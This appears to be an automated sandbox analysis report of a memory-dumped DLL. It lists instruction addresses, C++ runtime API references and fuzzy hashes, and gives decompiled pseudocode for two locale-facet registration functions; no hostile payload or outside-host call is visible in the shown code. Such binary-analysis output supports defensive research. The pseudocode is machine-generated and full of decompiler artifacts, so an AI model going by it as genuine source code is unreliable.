0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3
0x6e199177
0x6e199177
0x6e19917a
0x6e19917e
0x6e199182
0x6e19918f
0x6e199197
0x6e199199
0x00000000
0x6e199199
0x6e199160
0x6e199160
0x00000000
0x6e199160
0x6e19915e
0x6e1990e2
0x6e1990e2
0x6e1990e5
0x6e1990e9
0x6e1990ed
0x6e1990fa
0x6e199102
0x6e199104
0x00000000
0x6e199104
0x6e1990cb
0x6e1990cb
0x00000000
0x6e1990cb
0x6e1990c9
0x6e19904d
0x6e19904d
0x6e199050
0x6e199054
0x6e199058
0x6e199065
0x6e19906d
0x6e19906f
0x00000000
0x6e19906f
0x6e199036
0x6e199036
0x00000000
0x6e199036
0x6e199034
0x6e198fb8
0x6e198fb8
0x6e198fbb
0x6e198fbf
0x6e198fc3
0x6e198fd0
0x6e198fd8
0x6e198fda
0x00000000
0x6e198fda
0x6e198fa1
0x6e198fa1
0x00000000
0x6e198fa1
0x6e198f9f
0x6e198f23
0x6e198f23
0x6e198f26
0x6e198f2a
0x6e198f2e
0x6e198f3b
0x6e198f43
0x6e198f45
0x00000000
0x6e198f45
0x6e198f0c
0x6e198f0c
0x00000000
0x6e198f0c
0x6e198f0a
0x6e198e8e
0x6e198e8e
0x6e198e91
0x6e198e95
0x6e198e99
0x6e198ea6
0x6e198eae
0x6e198eb0
0x00000000
0x6e198eb0
0x6e198e77
0x6e198e77
0x00000000
0x6e198e77
0x6e198e75
0x6e198df9
0x6e198df9
0x6e198dfc
0x6e198e00
0x6e198e04
0x6e198e11
0x6e198e19
0x6e198e1b
0x00000000
0x6e198e1b
0x6e198de2
0x6e198de2
0x00000000
0x6e198de2
0x6e198de0

APIs

__EH_prolog3.LIBCMT ref: 6E198DA9
std::_Lockit::_Lockit.LIBCPMT ref: 6E198DB3

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

collate.LIBCPMT ref: 6E198DED
std::_Facet_Register.LIBCPMT ref: 6E198E04
std::_Lockit::~_Lockit.LIBCPMT ref: 6E198E24
Concurrency::cancel_current_task.LIBCPMT ref: 6E198E31

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
String ID:
API String ID: 854050597-0
Opcode ID: fd563bb426b6e96af3f2d2032ec5ffccf0a72d2c7ebae35b758a3ced18c38b85
Instruction ID: b9c5f9ff80df82dcf86efd7d197706c31ee95018ebd097e7722d357b9bc2875e
Opcode Fuzzy Hash: fd563bb426b6e96af3f2d2032ec5ffccf0a72d2c7ebae35b758a3ced18c38b85
Instruction Fuzzy Hash: 1901C4359001198FCF05DBE4C864AFEB77AAF84314F244909E811AB280CF309EC5FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5A35, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1A5A35(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t98;
				void* _t169;
				signed int _t248;
				void* _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				void* _t295;

				_t206 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t295 - 0x14, 0);
				_t280 =  *0x6e22175c; // 0x0
				 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
				 *(_t295 - 0x10) = _t280;
				_t98 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(__ebx, 0x6e221740, __edi, _t280));
				_t272 = _t98;
				if(_t98 != 0) {
					L5:
					E6E18F30C(_t295 - 0x14);
					return E6E1A9D88(_t272);
				} else {
					if(_t280 == 0) {
						_push( *((intOrPtr*)(_t295 + 8)));
						_push(_t295 - 0x10);
						__eflags = E6E1A607B(__ebx, _t272, _t280) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t206, _t272, _t280, 8);
							E6E18F2A5(_t295 - 0x14, 0);
							_t281 =  *0x6e221760; // 0x0
							 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
							 *(_t295 - 0x10) = _t281;
							_t273 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e221744, _t272, _t281));
							__eflags = _t273;
							if(_t273 != 0) {
								L12:
								E6E18F30C(_t295 - 0x14);
								return E6E1A9D88(_t273);
							} else {
								__eflags = _t281;
								if(_t281 == 0) {
									_push( *((intOrPtr*)(_t295 + 8)));
									_push(_t295 - 0x10);
									__eflags = E6E1A60E3(_t206, _t273, _t281) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t206, _t273, _t281, 8);
										E6E18F2A5(_t295 - 0x14, 0);
										_t282 =  *0x6e221764; // 0x0
										 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
										 *(_t295 - 0x10) = _t282;
										_t274 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e221748, _t273, _t282));
										__eflags = _t274;
										if(_t274 != 0) {
											L19:
											E6E18F30C(_t295 - 0x14);
											return E6E1A9D88(_t274);
										} else {
											__eflags = _t282;
											if(_t282 == 0) {
												_push( *((intOrPtr*)(_t295 + 8)));
												_push(_t295 - 0x10);
												__eflags = E6E1A614B(_t206, _t274, _t282) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t206, _t274, _t282, 8);
													E6E18F2A5(_t295 - 0x14, 0);
													_t283 =  *0x6e22176c; // 0x0
													 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
													 *(_t295 - 0x10) = _t283;
													_t275 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e221750, _t274, _t283));
													__eflags = _t275;
													if(_t275 != 0) {
														L26:
														E6E18F30C(_t295 - 0x14);
														return E6E1A9D88(_t275);
													} else {
														__eflags = _t283;
														if(_t283 == 0) {
															_push( *((intOrPtr*)(_t295 + 8)));
															_push(_t295 - 0x10);
															__eflags = E6E1A61B3(_t206, _t275, _t283) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t206, _t275, _t283, 8);
																E6E18F2A5(_t295 - 0x14, 0);
																_t284 =  *0x6e221768; // 0x0
																 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
																 *(_t295 - 0x10) = _t284;
																_t276 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e22174c, _t275, _t284));
																__eflags = _t276;
																if(_t276 != 0) {
																	L33:
																	E6E18F30C(_t295 - 0x14);
																	return E6E1A9D88(_t276);
																} else {
																	__eflags = _t284;
																	if(_t284 == 0) {
																		_push( *((intOrPtr*)(_t295 + 8)));
																		_push(_t295 - 0x10);
																		__eflags = E6E1A6237(_t206, _t276, _t284) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t206, _t276, _t284, 8);
																			E6E18F2A5(_t295 - 0x14, 0);
																			_t285 =  *0x6e221770; // 0x0
																			 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
																			 *(_t295 - 0x10) = _t285;
																			_t277 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e221754, _t276, _t285));
																			__eflags = _t277;
																			if(_t277 != 0) {
																				L40:
																				E6E18F30C(_t295 - 0x14);
																				return E6E1A9D88(_t277);
																			} else {
																				__eflags = _t285;
																				if(_t285 == 0) {
																					_push( *((intOrPtr*)(_t295 + 8)));
																					_push(_t295 - 0x10);
																					__eflags = E6E1A62BC(_t206, _t277, _t285) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t206, _t277, _t285, 8);
																						E6E18F2A5(_t295 - 0x14, 0);
																						_t286 =  *0x6e221774; // 0x0
																						 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
																						 *(_t295 - 0x10) = _t286;
																						_t278 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e221758, _t277, _t286));
																						__eflags = _t278;
																						if(_t278 != 0) {
																							L47:
																							E6E18F30C(_t295 - 0x14);
																							return E6E1A9D88(_t278);
																						} else {
																							__eflags = _t286;
																							if(_t286 == 0) {
																								_push( *((intOrPtr*)(_t295 + 8)));
																								_push(_t295 - 0x10);
																								_t169 = E6E1A6328(_t206, _t278, _t286);
																								_pop(_t248);
																								__eflags = _t169 - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ecb1a, _t206, _t278, _t286, 4);
																									_t287 = _t248;
																									 *(_t295 - 0x10) = _t287;
																									 *((intOrPtr*)(_t287 + 4)) =  *((intOrPtr*)(_t295 + 0xc));
																									_push( *((intOrPtr*)(_t295 + 0x14)));
																									_t91 = _t295 - 4;
																									 *_t91 =  *(_t295 - 4) & 0x00000000;
																									__eflags =  *_t91;
																									 *_t287 = 0x6e1f25a4;
																									 *((char*)(_t287 + 0x28)) =  *((intOrPtr*)(_t295 + 0x10));
																									E6E1A7184(_t206, _t248, _t270, _t278, _t287,  *_t91);
																									return E6E1A9D88(_t287,  *((intOrPtr*)(_t295 + 8)));
																								} else {
																									_t278 =  *(_t295 - 0x10);
																									 *(_t295 - 0x10) = _t278;
																									 *(_t295 - 4) = 1;
																									E6E1911C1(__eflags, _t278);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t278 + 4))))();
																									 *0x6e221774 = _t278;
																									goto L47;
																								}
																							} else {
																								_t278 = _t286;
																								goto L47;
																							}
																						}
																					} else {
																						_t277 =  *(_t295 - 0x10);
																						 *(_t295 - 0x10) = _t277;
																						 *(_t295 - 4) = 1;
																						E6E1911C1(__eflags, _t277);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t277 + 4))))();
																						 *0x6e221770 = _t277;
																						goto L40;
																					}
																				} else {
																					_t277 = _t285;
																					goto L40;
																				}
																			}
																		} else {
																			_t276 =  *(_t295 - 0x10);
																			 *(_t295 - 0x10) = _t276;
																			 *(_t295 - 4) = 1;
																			E6E1911C1(__eflags, _t276);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t276 + 4))))();
																			 *0x6e221768 = _t276;
																			goto L33;
																		}
																	} else {
																		_t276 = _t284;
																		goto L33;
																	}
																}
															} else {
																_t275 =  *(_t295 - 0x10);
																 *(_t295 - 0x10) = _t275;
																 *(_t295 - 4) = 1;
																E6E1911C1(__eflags, _t275);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t275 + 4))))();
																 *0x6e22176c = _t275;
																goto L26;
															}
														} else {
															_t275 = _t283;
															goto L26;
														}
													}
												} else {
													_t274 =  *(_t295 - 0x10);
													 *(_t295 - 0x10) = _t274;
													 *(_t295 - 4) = 1;
													E6E1911C1(__eflags, _t274);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t274 + 4))))();
													 *0x6e221764 = _t274;
													goto L19;
												}
											} else {
												_t274 = _t282;
												goto L19;
											}
										}
									} else {
										_t273 =  *(_t295 - 0x10);
										 *(_t295 - 0x10) = _t273;
										 *(_t295 - 4) = 1;
										E6E1911C1(__eflags, _t273);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t273 + 4))))();
										 *0x6e221760 = _t273;
										goto L12;
									}
								} else {
									_t273 = _t281;
									goto L12;
								}
							}
						} else {
							_t272 =  *(_t295 - 0x10);
							 *(_t295 - 0x10) = _t272;
							 *(_t295 - 4) = 1;
							E6E1911C1(__eflags, _t272);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t272 + 4))))();
							 *0x6e22175c = _t272;
							goto L5;
						}
					} else {
						_t272 = _t280;
						goto L5;
					}
				}
			}

0x6e1a5a35
0x6e1a5a3c
0x6e1a5a46
0x6e1a5a4b
0x6e1a5a56
0x6e1a5a5a
0x6e1a5a66
0x6e1a5a6b
0x6e1a5a6f
0x6e1a5ab4
0x6e1a5ab7
0x6e1a5ac3
0x6e1a5a71
0x6e1a5a73
0x6e1a5a79
0x6e1a5a7f
0x6e1a5a87
0x6e1a5a8a
0x6e1a5ac4
0x6e1a5ac9
0x6e1a5ad1
0x6e1a5adb
0x6e1a5ae0
0x6e1a5aeb
0x6e1a5aef
0x6e1a5b00
0x6e1a5b02
0x6e1a5b04
0x6e1a5b49
0x6e1a5b4c
0x6e1a5b58
0x6e1a5b06
0x6e1a5b06
0x6e1a5b08
0x6e1a5b0e
0x6e1a5b14
0x6e1a5b1c
0x6e1a5b1f
0x6e1a5b59
0x6e1a5b5e
0x6e1a5b66
0x6e1a5b70
0x6e1a5b75
0x6e1a5b80
0x6e1a5b84
0x6e1a5b95
0x6e1a5b97
0x6e1a5b99
0x6e1a5bde
0x6e1a5be1
0x6e1a5bed
0x6e1a5b9b
0x6e1a5b9b
0x6e1a5b9d
0x6e1a5ba3
0x6e1a5ba9
0x6e1a5bb1
0x6e1a5bb4
0x6e1a5bee
0x6e1a5bf3
0x6e1a5bfb
0x6e1a5c05
0x6e1a5c0a
0x6e1a5c15
0x6e1a5c19
0x6e1a5c2a
0x6e1a5c2c
0x6e1a5c2e
0x6e1a5c73
0x6e1a5c76
0x6e1a5c82
0x6e1a5c30
0x6e1a5c30
0x6e1a5c32
0x6e1a5c38
0x6e1a5c3e
0x6e1a5c46
0x6e1a5c49
0x6e1a5c83
0x6e1a5c88
0x6e1a5c90
0x6e1a5c9a
0x6e1a5c9f
0x6e1a5caa
0x6e1a5cae
0x6e1a5cbf
0x6e1a5cc1
0x6e1a5cc3
0x6e1a5d08
0x6e1a5d0b
0x6e1a5d17
0x6e1a5cc5
0x6e1a5cc5
0x6e1a5cc7
0x6e1a5ccd
0x6e1a5cd3
0x6e1a5cdb
0x6e1a5cde
0x6e1a5d18
0x6e1a5d1d
0x6e1a5d25
0x6e1a5d2f
0x6e1a5d34
0x6e1a5d3f
0x6e1a5d43
0x6e1a5d54
0x6e1a5d56
0x6e1a5d58
0x6e1a5d9d
0x6e1a5da0
0x6e1a5dac
0x6e1a5d5a
0x6e1a5d5a
0x6e1a5d5c
0x6e1a5d62
0x6e1a5d68
0x6e1a5d70
0x6e1a5d73
0x6e1a5dad
0x6e1a5db2
0x6e1a5dba
0x6e1a5dc4
0x6e1a5dc9
0x6e1a5dd4
0x6e1a5dd8
0x6e1a5de9
0x6e1a5deb
0x6e1a5ded
0x6e1a5e32
0x6e1a5e35
0x6e1a5e41
0x6e1a5def
0x6e1a5def
0x6e1a5df1
0x6e1a5df7
0x6e1a5dfd
0x6e1a5dfe
0x6e1a5e04
0x6e1a5e05
0x6e1a5e08
0x6e1a5e42
0x6e1a5e47
0x6e1a5e4f
0x6e1a5e54
0x6e1a5e56
0x6e1a5e5c
0x6e1a5e5f
0x6e1a5e68
0x6e1a5e68
0x6e1a5e68
0x6e1a5e6c
0x6e1a5e72
0x6e1a5e75
0x6e1a5e81
0x6e1a5e0a
0x6e1a5e0a
0x6e1a5e0d
0x6e1a5e11
0x6e1a5e15
0x6e1a5e22
0x6e1a5e2a
0x6e1a5e2c
0x00000000
0x6e1a5e2c
0x6e1a5df3
0x6e1a5df3
0x00000000
0x6e1a5df3
0x6e1a5df1
0x6e1a5d75
0x6e1a5d75
0x6e1a5d78
0x6e1a5d7c
0x6e1a5d80
0x6e1a5d8d
0x6e1a5d95
0x6e1a5d97
0x00000000
0x6e1a5d97
0x6e1a5d5e
0x6e1a5d5e
0x00000000
0x6e1a5d5e
0x6e1a5d5c
0x6e1a5ce0
0x6e1a5ce0
0x6e1a5ce3
0x6e1a5ce7
0x6e1a5ceb
0x6e1a5cf8
0x6e1a5d00
0x6e1a5d02
0x00000000
0x6e1a5d02
0x6e1a5cc9
0x6e1a5cc9
0x00000000
0x6e1a5cc9
0x6e1a5cc7
0x6e1a5c4b
0x6e1a5c4b
0x6e1a5c4e
0x6e1a5c52
0x6e1a5c56
0x6e1a5c63
0x6e1a5c6b
0x6e1a5c6d
0x00000000
0x6e1a5c6d
0x6e1a5c34
0x6e1a5c34
0x00000000
0x6e1a5c34
0x6e1a5c32
0x6e1a5bb6
0x6e1a5bb6
0x6e1a5bb9
0x6e1a5bbd
0x6e1a5bc1
0x6e1a5bce
0x6e1a5bd6
0x6e1a5bd8
0x00000000
0x6e1a5bd8
0x6e1a5b9f
0x6e1a5b9f
0x00000000
0x6e1a5b9f
0x6e1a5b9d
0x6e1a5b21
0x6e1a5b21
0x6e1a5b24
0x6e1a5b28
0x6e1a5b2c
0x6e1a5b39
0x6e1a5b41
0x6e1a5b43
0x00000000
0x6e1a5b43
0x6e1a5b0a
0x6e1a5b0a
0x00000000
0x6e1a5b0a
0x6e1a5b08
0x6e1a5a8c
0x6e1a5a8c
0x6e1a5a8f
0x6e1a5a93
0x6e1a5a97
0x6e1a5aa4
0x6e1a5aac
0x6e1a5aae
0x00000000
0x6e1a5aae
0x6e1a5a75
0x6e1a5a75
0x00000000
0x6e1a5a75
0x6e1a5a73

APIs

__EH_prolog3.LIBCMT ref: 6E1A5A3C
std::_Lockit::_Lockit.LIBCPMT ref: 6E1A5A46

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

messages.LIBCPMT ref: 6E1A5A80
std::_Facet_Register.LIBCPMT ref: 6E1A5A97
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A5AB7
Concurrency::cancel_current_task.LIBCPMT ref: 6E1A5AC4

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4019330243-0
Opcode ID: ba88f73cf0ea72cf37cdf5474ba90826a41fc87de29dd1000fd9ba4cb9674ae8
Instruction ID: 3d9988620228243624e55f100f26299a3667a51914be62b074eaf32b7dc1640a
Opcode Fuzzy Hash: ba88f73cf0ea72cf37cdf5474ba90826a41fc87de29dd1000fd9ba4cb9674ae8
Instruction Fuzzy Hash: FA01C439A00519DFCF05DBE8C8506FE777AAF84314F254809E911AB280CF309DC4EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5BF4, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E1A5BF4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t62;
				void* _t100;
				signed int _t149;
				void* _t162;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				signed int _t169;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t178;

				_t125 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t178 - 0x14, 0);
				_t169 =  *0x6e22176c; // 0x0
				 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
				 *(_t178 - 0x10) = _t169;
				_t62 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(__ebx, 0x6e221750, __edi, _t169));
				_t164 = _t62;
				if(_t62 != 0) {
					L5:
					E6E18F30C(_t178 - 0x14);
					return E6E1A9D88(_t164);
				} else {
					if(_t169 == 0) {
						_push( *((intOrPtr*)(_t178 + 8)));
						_push(_t178 - 0x10);
						__eflags = E6E1A61B3(__ebx, _t164, _t169) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t125, _t164, _t169, 8);
							E6E18F2A5(_t178 - 0x14, 0);
							_t170 =  *0x6e221768; // 0x0
							 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
							 *(_t178 - 0x10) = _t170;
							_t165 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(_t125, 0x6e22174c, _t164, _t170));
							__eflags = _t165;
							if(_t165 != 0) {
								L12:
								E6E18F30C(_t178 - 0x14);
								return E6E1A9D88(_t165);
							} else {
								__eflags = _t170;
								if(_t170 == 0) {
									_push( *((intOrPtr*)(_t178 + 8)));
									_push(_t178 - 0x10);
									__eflags = E6E1A6237(_t125, _t165, _t170) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t125, _t165, _t170, 8);
										E6E18F2A5(_t178 - 0x14, 0);
										_t171 =  *0x6e221770; // 0x0
										 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
										 *(_t178 - 0x10) = _t171;
										_t166 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(_t125, 0x6e221754, _t165, _t171));
										__eflags = _t166;
										if(_t166 != 0) {
											L19:
											E6E18F30C(_t178 - 0x14);
											return E6E1A9D88(_t166);
										} else {
											__eflags = _t171;
											if(_t171 == 0) {
												_push( *((intOrPtr*)(_t178 + 8)));
												_push(_t178 - 0x10);
												__eflags = E6E1A62BC(_t125, _t166, _t171) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t125, _t166, _t171, 8);
													E6E18F2A5(_t178 - 0x14, 0);
													_t172 =  *0x6e221774; // 0x0
													 *(_t178 - 4) =  *(_t178 - 4) & 0x00000000;
													 *(_t178 - 0x10) = _t172;
													_t167 = E6E162171( *((intOrPtr*)(_t178 + 8)), E6E161F29(_t125, 0x6e221758, _t166, _t172));
													__eflags = _t167;
													if(_t167 != 0) {
														L26:
														E6E18F30C(_t178 - 0x14);
														return E6E1A9D88(_t167);
													} else {
														__eflags = _t172;
														if(_t172 == 0) {
